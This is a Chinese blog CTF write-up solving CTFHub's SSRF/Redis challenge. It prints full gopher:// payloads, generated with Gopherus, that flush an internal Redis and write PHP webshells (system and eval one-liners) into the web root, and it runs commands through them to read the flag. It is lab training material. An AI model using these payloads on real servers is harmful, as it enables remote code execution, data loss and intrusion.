CTFHub-->web-->ssrf-->Redis协议

已于 2023-09-20 10:30:38 修改
阅读量500 收藏 4
点赞数
文章标签: 前端 redis 数据库 python 网络安全 web安全
于 2023-09-20 10:05:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63610715/article/details/133033269
版权

目录

什么是Redis协议

CTF打靶

执行系统命令读取

 使用蚁剑连接读取

坑点

什么是Redis协议

Redis协议,也被称为 RESP (Redis Serialization Protocol),它是一种简单的文本协议,用于在客户端和服务器之间操作和传输数据。可以说是最简单的一种传输协议。

CTF打靶

启动环境

访问环境

 利用工具gopherus来生成payload

工具下载地址:https://github.com/tarunkant/Gopherus.git

python2 gopherus.py --exploit redis

这里我们使用PHPshell 并且使用默认路径,生成代码的文件名为 shell.php

执行系统命令读取

我们先来看工具生成的代码原始模样

它使用的是 system 也就是能执行系统命令,使用蚁剑是连接不成功的

将工具生成的代码再进行一次URL编码

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

拼接进行访问,等待上传,速度有点慢

上传后,界面是这个样子

这时我们访问shell.php(工具默认生成的文件名)

 由于shell.php是使用get传参cmd为变量名,所以这里拼接 ?cmd=ls /  进行访问

http://challenge-b33bf5c8b7b97905.sandbox.ctfhub.com:10800/shell.php?cmd=ls /

进一步读取flag

http://challenge-b33bf5c8b7b97905.sandbox.ctfhub.com:10800/shell.php?cmd=cat%20/flag_139a762fb4c425a03cff8d0b12aa960b

​ flag获取成功

使用蚁剑连接读取

还是使用工具生成,生成shell的时候 我们使用自己写入的一句话木马

<?php @eval($_POST['cmd'])?>

 将生成的代码在URL编码一次

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

 拼接访问,等待文件上传,时间有点久

上传后界面还是这个样子

这时我们再拼接访问 shell.php

http://challenge-b33bf5c8b7b97905.sandbox.ctfhub.com:10800/shell.php

​ 然后使用蚁剑进行连接

访问根目录,找到flag

 

坑点

  • 不论采取哪个方法,使用 gopherus.py编码后要再进行一次URL编码
  • 注意工具自动生成的shell是执行系统命令的,使用蚁剑是连接不上的
  • 工具生成shell的文件名为 shell.php
  • 注意访问的是上传后的文件,即:shell.php
unlash~
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
ctfhub--redis协议(巧用redis攻击内网)
qq_64201116的博客
06-28 1911
使用redis未授权访问或弱口令攻击内网
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2326
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
CTF SSRF redis写入shell、计划任务
03-07 1048
CTF SSRF redis写入shell、计划任务
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 1985
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTF - WEB redis的简介与利用
iamsongyu的博客
11-17 2888
        Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。         Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。              --百度 ...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
漏扫工具推荐-Invicti-Professional-v23.9
09-28
Invicti是一种自动化但完全可配置的Web 应用程序安全扫描程序,使您能够扫描网站、Web 应用程序和 Web 服务,并识别安全漏洞。Invicti可以扫描所有类型的 Web 应用程序,无论其构建平台或语言。Invicti 是唯一一款...
攻防_漏洞_Redis未授权
redglare的博客
01-11 1923
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1183
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHub题解-技能树-Misc-流量分析-数据库类流量【MySQL流量、Redis流量、MongoDB流量】
wlw_xx的博客
08-15 1456
CTHUB wireshark简单学习
ssrf漏洞利用(内网探测、打redis)
Javachichi的博客
02-06 1979
声明该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!
CTFHub SSRF Redis协议 WriteUp
柠檬i的博客
12-31 521
SSRF+Redis组合拳绝对路径写webshell
基于SSRF+Redis的内网渗透
weixin_46686336的博客
11-07 676
基于SSRF+Redis的内网渗透
CTFHub-Redis
鸣蜩十四的博客
08-09 608
和fastcgi的题比较类似,使用gopherus生成redis的shell,经过一次url编码,就构成了最终的payload,注意的是redis的端口是6379 经过一次编码,bp使用gopher协议发包,虽然是504,但是我们的shell已经传输上去了,用蚁剑链接查看flag ...
SSRF攻击与Gopher协议
RuiLike的博客
06-04 1317
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
CTFHubRedIs协议
最新发布
weixin_57240513的博客
07-24 183
cmd=system(cat /flag文件)ls / 查看根目录。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值